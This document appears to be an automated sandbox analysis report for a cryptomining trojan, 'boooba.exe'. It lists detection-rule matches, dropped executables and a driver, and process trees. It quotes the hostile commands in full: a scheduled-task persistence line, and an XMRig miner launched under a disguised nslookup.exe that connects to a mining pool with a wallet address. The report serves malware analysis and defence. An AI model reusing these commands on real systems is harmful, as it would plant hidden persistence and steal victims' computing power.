Source: 0000000B.00000003.1780781024.000001E32C458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1776641956.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1775882569.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1790022060.0000013CBC459000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1784241324.000001E32C451000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1772851303.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1772933403.000001E32C458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1773553446.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000003.1774784480.000001E32C453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000003.1774354264.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: conhost.exe PID: 5348, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: conhost.exe PID: 4136, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25

Source: classification engine

Classification label: mal100.troj.evad.mine.winEXE@26/5@1/1

Source: C:\Windows\System32\conhost.exe

File created: C:\Users\user\IOAshdohSha.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7132:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6924:120:WilError_03

Source: boooba.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='nslookup.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='nslookup.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='nslookup.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='nslookup.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='nslookup.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='nslookup.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='nslookup.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='nslookup.exe'

Source: C:\Windows\System32\conhost.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\boooba.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: boooba.exe

ReversingLabs: Detection: 71%

Source: nslookup.exe	String found in binary or memory: id-cmc-addExtensions
Source: nslookup.exe	String found in binary or memory: set-addPolicy
Source: nslookup.exe	String found in binary or memory: id-cmc-addExtensions
Source: nslookup.exe	String found in binary or memory: set-addPolicy

Source: unknown	Process created: C:\Users\user\Desktop\boooba.exe "C:\Users\user\Desktop\boooba.exe"
Source: C:\Users\user\Desktop\boooba.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\Desktop\boooba.exe"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\user\IOAshdohSha.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\user\IOAshdohSha.exe"
Source: unknown	Process created: C:\Users\user\IOAshdohSha.exe C:\Users\user\IOAshdohSha.exe
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c "C:\Users\user\IOAshdohSha.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\IOAshdohSha.exe C:\Users\user\IOAshdohSha.exe
Source: C:\Users\user\IOAshdohSha.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\IOAshdohSha.exe"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"
Source: C:\Users\user\IOAshdohSha.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\IOAshdohSha.exe"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\nslookup.exe C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\nslookup.exe C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "/sihost64"
Source: C:\Users\user\Desktop\boooba.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\Desktop\boooba.exe"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\user\IOAshdohSha.exe"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c "C:\Users\user\IOAshdohSha.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\user\IOAshdohSha.exe"	Jump to behavior
Source: C:\Users\user\IOAshdohSha.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\IOAshdohSha.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\IOAshdohSha.exe C:\Users\user\IOAshdohSha.exe	Jump to behavior
Source: C:\Users\user\IOAshdohSha.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\IOAshdohSha.exe"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\nslookup.exe C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "/sihost64"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\nslookup.exe C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100	Jump to behavior

Source: C:\Users\user\Desktop\boooba.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\IOAshdohSha.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: wldp.dll	Jump to behavior

Source: C:\Windows\System32\conhost.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: boooba.exe

Static file information: File size 2234368 > 1048576

Source: boooba.exe

Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x21fc00

Persistence and Installation Behavior

Sample is not signed and drops a device driver

Source: C:\Windows\System32\conhost.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys

Jump to behavior

Drops PE files

Source: C:\Windows\System32\conhost.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys	Jump to dropped file
Source: C:\Windows\System32\conhost.exe	File created: C:\Users\user\IOAshdohSha.exe	Jump to dropped file
Source: C:\Windows\System32\conhost.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Jump to dropped file

Drops PE files to the user directory

Source: C:\Windows\System32\conhost.exe

File created: C:\Users\user\IOAshdohSha.exe

Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Windows\System32\conhost.exe

File created: C:\Users\user\IOAshdohSha.exe

Jump to dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\user\IOAshdohSha.exe"

Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
